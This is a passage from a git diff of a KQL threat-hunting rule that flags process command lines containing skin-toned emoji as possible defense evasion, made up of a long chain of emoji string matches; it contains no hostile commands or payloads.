"🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains "👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql index 2fee1173..3870877d 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql @@ -1,10 +1,10 @@ -// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-12-05 -// Level: high -// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains "🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains "👦🏽" or ProcessCommandLine contains "👩🏽" or ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains "🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains "🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains 